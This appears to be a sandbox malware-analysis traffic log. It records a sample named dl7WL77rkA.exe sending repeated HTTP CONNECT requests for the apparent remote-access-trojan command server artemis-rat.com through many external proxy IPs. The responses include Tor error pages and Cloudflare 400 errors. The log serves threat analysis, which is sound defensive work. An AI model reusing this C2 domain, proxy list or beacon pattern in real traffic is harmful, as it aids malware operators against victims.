                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 54 6f 72 20 61 73 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 6f 72 20 69 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 21 2d 2d 20 50 6c 75 73 20 74 68 69 73 20 63 6f 6d 6d 65 6e 74 2c 20 74 6f 20 6d 61 6b 65 20 74 68 65 20 62 6f 64 79 20 72 65 73 70 6f 6e 73 65 20 6d 6f 72 65 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 73 6f 20 20 20 20 20 20 49 45 20 77 69 6c 6c 20 62 65 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 70 6c 61 79 20 69 74 2e 20 43 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 20 20 20 20 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 2e 2d 2d 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:05.676084042 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 54 6f 72 20 61 73 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 6f 72 20 69 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 21 2d 2d 20 50 6c 75 73 20 74 68 69 73 20 63 6f 6d 6d 65 6e 74 2c 20 74 6f 20 6d 61 6b 65 20 74 68 65 20 62 6f 64 79 20 72 65 73 70 6f 6e 73 65 20 6d 6f 72 65 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 73 6f 20 20 20 20 20 20 49 45 20 77 69 6c 6c 20 62 65 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 70 6c 61 79 20 69 74 2e 20 43 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 20 20 20 20 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 2e 2d 2d 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:17.706581116 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 54 6f 72 20 61 73 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 6f 72 20 69 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 21 2d 2d 20 50 6c 75 73 20 74 68 69 73 20 63 6f 6d 6d 65 6e 74 2c 20 74 6f 20 6d 61 6b 65 20 74 68 65 20 62 6f 64 79 20 72 65 73 70 6f 6e 73 65 20 6d 6f 72 65 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 73 6f 20 20 20 20 20 20 49 45 20 77 69 6c 6c 20 62 65 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 70 6c 61 79 20 69 74 2e 20 43 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 20 20 20 20 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 2e 2d 2d 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:42.536922932 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 54 6f 72 20 61 73 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 6f 72 20 69 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 21 2d 2d 20 50 6c 75 73 20 74 68 69 73 20 63 6f 6d 6d 65 6e 74 2c 20 74 6f 20 6d 61 6b 65 20 74 68 65 20 62 6f 64 79 20 72 65 73 70 6f 6e 73 65 20 6d 6f 72 65 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 73 6f 20 20 20 20 20 20 49 45 20 77 69 6c 6c 20 62 65 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 70 6c 61 79 20 69 74 2e 20 43 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 20 20 20 20 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 2e 2d 2d 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1318192.168.2.552080162.241.50.179537553876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.416896105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405189037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1319192.168.2.552831199.116.114.1141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.417576075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1320192.168.2.55198362.171.169.37584023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.421966076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514465094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.514730930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1321192.168.2.552956184.170.245.14841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.422822952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1322192.168.2.553652140.84.176.2464433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.431906939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1323192.168.2.55353945.11.95.16660043876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.435878038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.862637043 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1324192.168.2.553653140.84.176.2464433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.437128067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1325192.168.2.551858148.66.130.5378303876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.437954903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1326192.168.2.553655140.84.176.2464433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.440387964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1327192.168.2.55354065.21.255.19731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.441498041 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.769501925 CET75INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.132849932 CET103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                            Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1328192.168.2.553656140.84.176.2464433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.443532944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1329192.168.2.553582104.16.107.206803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.453322887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.607558966 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1330192.168.2.553600104.23.107.172803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.460208893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.622806072 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1331192.168.2.55354145.233.2.141533876C:\Users\user\Desktop\dl7WL77rkA.exe
